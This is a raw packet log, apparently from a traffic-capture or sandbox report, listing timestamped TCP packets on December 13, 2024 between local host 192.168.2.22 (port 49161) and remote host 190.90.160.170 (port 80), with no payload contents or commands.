                          Dec 13, 2024 17:54:41.728127003 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.728142977 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.728183031 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.729024887 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.729091883 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.729130983 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.729224920 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.730015993 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.730077982 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.730122089 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.730160952 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.731040955 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.731095076 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.731173992 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.731254101 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.732078075 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.732142925 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.732181072 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.732222080 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.732989073 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.733056068 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.733061075 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.733108044 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.733972073 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.734041929 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.734076977 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.734124899 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.734935999 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.734986067 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.735034943 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.735079050 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.735934019 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.736001015 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.736015081 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.736059904 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.737015963 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.737068892 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.737135887 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.737188101 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.737956047 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.738017082 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.738025904 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.738079071 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.738929033 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.739000082 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.739032030 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.739100933 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.739860058 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.739934921 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.880364895 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.880412102 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.880503893 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.880752087 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.880795002 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.881115913 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.881159067 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.881740093 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.881777048 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.881783009 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.881836891 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.882719040 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.882771015 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.882821083 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.882859945 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.883728981 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.883773088 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.883877993 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.883918047 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.884706974 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.884749889 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.884812117 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.884850979 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.885751009 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.885797977 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.885900021 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.885941029 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.886681080 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.886723042 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.886744022 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.886782885 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.887645960 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.887691021 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.887742996 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.887785912 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.888659000 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.888699055 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.888762951 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.888802052 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.889632940 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.889657021 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.889694929 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.889719009 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.890717030 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.890765905 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.890861034 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.890908957 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.891820908 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.891870022 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.891973019 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.892015934 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.892890930 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.892946005 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.892950058 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.892986059 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.893887997 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.893944025 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.893987894 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.894022942 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.894689083 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.894732952 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.894766092 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.894812107 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.895606995 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.895646095 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.895658970 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.895708084 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.896574020 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.896624088 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.896667957 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.896707058 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.897636890 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.897689104 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.897716999 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.897759914 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.898531914 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.898580074 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.898627043 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.898665905 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.899533033 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.899579048 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.899600029 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.899641037 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.900537014 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.900588989 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.900646925 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.900679111 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.901540995 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.901586056 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.901809931 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.901844025 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.902493000 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.902539968 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.902589083 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.902625084 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.903477907 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.903515100 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.903600931 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.903639078 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.904484034 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.904532909 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.904598951 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.904634953 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.905479908 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.905524969 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.905560970 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.905599117 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.906155109 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.906951904 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.906989098 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.907016039 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.907047987 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.907588959 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.907604933 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.907634974 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.907653093 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.908541918 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.908571959 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.908601999 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.909519911 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.909550905 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.909569979 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.909687042 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.909723043 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.910562992 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.910602093 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.910641909 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.910682917 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.911489010 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.911501884 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.911530018 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.911535978 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.911572933 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.912482023 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.912487030 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.912503958 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.912517071 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.912535906 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.913510084 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.913525105 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.913554907 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.913568020 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.914545059 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.914612055 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.914709091 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.914745092 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.915363073 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.915410995 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.915647030 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.915685892 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.916579962 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.916594982 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.916624069 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.916635036 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.917385101 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.917399883 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.917431116 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.917443037 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.918370008 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.918385983 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.918421030 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.919359922 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.919388056 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.919420004 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.920002937 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.920042992 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.920481920 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.920497894 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.920521021 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.920536041 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.921349049 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.921386957 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.922125101 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.922166109 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.922544003 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.922559023 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.922580004 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.922594070 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.923305988 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.923331022 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.923343897 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.923365116 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.924340010 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.924380064 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.925266027 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.925281048 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.925314903 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.925327063 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.926248074 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.926263094 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.926284075 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.926300049 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.926687002 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.926723957 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.927336931 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.927380085 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.928225994 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.928240061 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.928406000 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.928534985 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.928576946 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.929393053 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.929409027 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.929439068 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.929450989 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.930406094 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.930419922 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.930463076 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.930474997 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.931294918 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.931310892 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.931353092 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.932524920 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:41.932568073 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:41.932585001 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.072613001 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.072693110 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.072698116 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.072736979 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.072973967 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.072990894 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.073010921 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.073024035 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.073914051 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.073955059 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.074021101 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.074069023 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.074871063 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.074913025 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.074959993 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.074995041 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.075848103 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.075895071 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.076014042 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.076049089 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.076911926 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.076950073 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.076956987 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.077001095 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.077893019 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.077930927 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.077946901 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.077980995 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.078937054 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.078953028 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.078984022 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.078991890 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.079910040 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.079926014 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.079950094 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.079960108 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.080868959 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.080914974 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.080919027 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.080956936 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.081826925 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.081840992 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.081871033 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.082798958 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.082847118 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.082922935 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.083014011 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.083815098 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.083852053 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.083888054 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.083923101 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.084872007 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.084888935 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.084918022 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.084918022 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.085767984 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.085819960 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.085848093 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.085884094 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.086857080 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.086894989 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.086951971 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.087001085 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.087798119 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.087846041 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.087881088 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.087918043 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.088718891 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.088758945 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.088823080 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.088860989 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.089801073 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.089838982 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.090050936 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.090091944 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.090711117 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.090729952 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.090754032 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.090764999 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.091764927 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.091778994 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.091799974 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.091808081 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.092746973 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.092763901 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.092787981 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.092799902 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.093667030 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.093699932 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.094058990 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.094096899 CET4916180192.168.2.22190.90.160.170
                          Dec 13, 2024 17:54:42.094656944 CET8049161190.90.160.170192.168.2.22
                          Dec 13, 2024 17:54:42.094702959 CET4916180192.168.2.22190.90.160.170
